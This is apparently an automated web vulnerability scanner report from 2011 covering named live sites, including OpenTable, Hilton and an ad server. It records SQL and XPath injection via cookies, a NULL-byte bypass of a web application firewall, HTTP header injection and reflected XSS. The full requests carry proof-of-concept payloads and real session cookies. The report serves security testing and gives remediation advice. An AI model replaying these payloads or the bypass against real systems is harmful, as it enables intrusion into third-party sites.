<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /jscripts/ScriptHandler.ashx''?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:54:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a31&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=125; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
1.8. http://www3.hilton.com/en_US/hi/search/findhotels/results.htm [ClrSCD cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/results.htm

Issue detail

The ClrSCD cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ClrSCD cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /en_US/hi/search/findhotels/results.htm?view=LIST HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790%00'; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 12:54:08 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7567
Date: Mon, 03 Oct 2011 12:54:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml
...[SNIP]...
<![CDATA[
rb={"error_207":"Please enter an HHonors number or a username at least 4 characters long.","res_limitSelections":"res_limitSelections","error_208":"Please enter a PIN or Password at least 4 characters long.","da
...[SNIP]...

Request 2

GET /en_US/hi/search/findhotels/results.htm?view=LIST HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790%00''; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response 2

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 276089
Date: Mon, 03 Oct 2011 12:54:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
2. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The lsCKE cookie appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the lsCKE cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref%00'; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:03 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a03&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153%00'&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=13&vbefreg=13&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=13&vbefreg=13&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0iX7fFVCSU3hhJUEcO4Lt8; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
RAR8JX4UOhFln7kMNH6mfch22jHHy6DJT5k8UC/PHbtuza89m1Dpb4frwKts9iVxO7NXKBoJKuKdySxbGKxPQhGA/537GFK3jpq4pp+OuxyyL4fAsvwQa3V/Vmhojn9xjHtle08elp5ZmPrl2iSiHAtqpiq+fIjmPaC/uKoYUCSSkOV6hTvA7NxjZF5CTaAbfYvTCgX6WxpatHSmpTxwxmZYq0Rm+3UpFLK3YLJKLryaXoxgDlg6I90MQuuc+35Cn+deTP/8reoxLq74g3jdXQGEnjvNFe9gO0SLw340okK4hcrN9vI6XY5AiUaCmwJ/gTfyrLJtOyrNrQdlVT3rD82rS2ZxDvpBiNxhevBfX0vkrQFJ4Jc20FiI7xY9lubHSSXXU4nrbFaerD3uYzFVUDa
...[SNIP]...
3. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vacations.rooms.com
Path:   /wthrooms/Search

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload 55baf%0d%0a131faa15b77 was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

POST /wthrooms/Search HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
Content-Length: 1018
Cache-Control: max-age=0
Origin: http://vacations.rooms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://vacations.rooms.com/wthrooms/Search?DD=WTHROOMS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642339727:ss=1317642189940

redirect=55baf%0d%0a131faa15b77&mode=advanced&products=AHC&redirect=&airMode=&hotelMode=&carMode=&fromLocationId=&toLocationId=&DD=WTHROOMS&hotelLocationId=&hotelLocationToAdd=&hotelPropertyId=&differentHotelCity=false&ProductType=
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 12:58:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: -1
Set-Cookie: CDENsession=RgPWjSdMQ3rDCMNFCk9qzIqqT.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Location: http://vacations.rooms.com/wthrooms/55baf
131faa15b77?DD=WTHROOMS
Content-Length: 0
Content-Type: text/html;charset=UTF-8

4. Cross-site scripting (reflected)  previous  next
There are 94 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80951"><script>alert(1)</script>0cf9be4239a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM80951"><script>alert(1)</script>0cf9be4239a/DLX/1@x92 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM80951"><script>alert(1)</script>0cf9be4239a/DLX/2048296086/x92/default/empty.gif/4d686437616b364a7257384142793233?x" target="_top"><IMG SR
...[SNIP]...
4.2. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41357"><script>alert(1)</script>17858a976b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX41357"><script>alert(1)</script>17858a976b8/1@x92 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX41357"><script>alert(1)</script>17858a976b8/134632348/x92/default/empty.gif/4d686437616b364a725863414237306c?x" target="_top"><IMG SRC
...[SNIP]...
4.3. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e92"><script>alert(1)</script>bb4cab060f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x9240e92"><script>alert(1)</script>bb4cab060f HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1754400728/x9240e92"><script>alert(1)</script>bb4cab060f/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top"><IMG SRC
...[SNIP]...
4.4. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92293"-alert(1)-"3ff0c4ea86d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/DLX/1@x92?92293"-alert(1)-"3ff0c4ea86d=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3249
Content-Type: text/html

<html>
<head></head>
<body>
<script>
